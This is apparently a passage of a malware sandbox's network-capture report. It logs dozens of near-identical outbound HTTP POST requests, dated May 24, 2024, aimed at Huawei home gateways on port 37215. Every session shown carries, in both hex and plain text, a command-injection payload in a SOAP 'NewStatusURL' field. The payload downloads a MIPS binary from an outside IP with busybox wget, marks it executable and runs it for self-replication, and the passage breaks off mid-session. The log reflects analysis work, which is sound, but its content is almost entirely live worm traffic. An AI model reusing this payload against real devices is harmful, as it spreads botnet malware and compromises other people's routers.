                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1945192.168.2.1339190197.72.124.8937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.553499937 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1946192.168.2.1355878157.63.159.12037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.553565979 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1947192.168.2.134200841.4.135.20937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.553591013 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1948192.168.2.134829841.140.6.2237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.553601980 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1949192.168.2.1336482157.115.236.137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.553659916 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1950192.168.2.135734041.252.170.9437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.553715944 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1951192.168.2.1346488197.159.84.20637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.553715944 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1952192.168.2.135074241.66.122.7637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.554042101 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1953192.168.2.135909448.97.65.14837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.554096937 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1954192.168.2.135427843.158.183.5937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.554133892 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
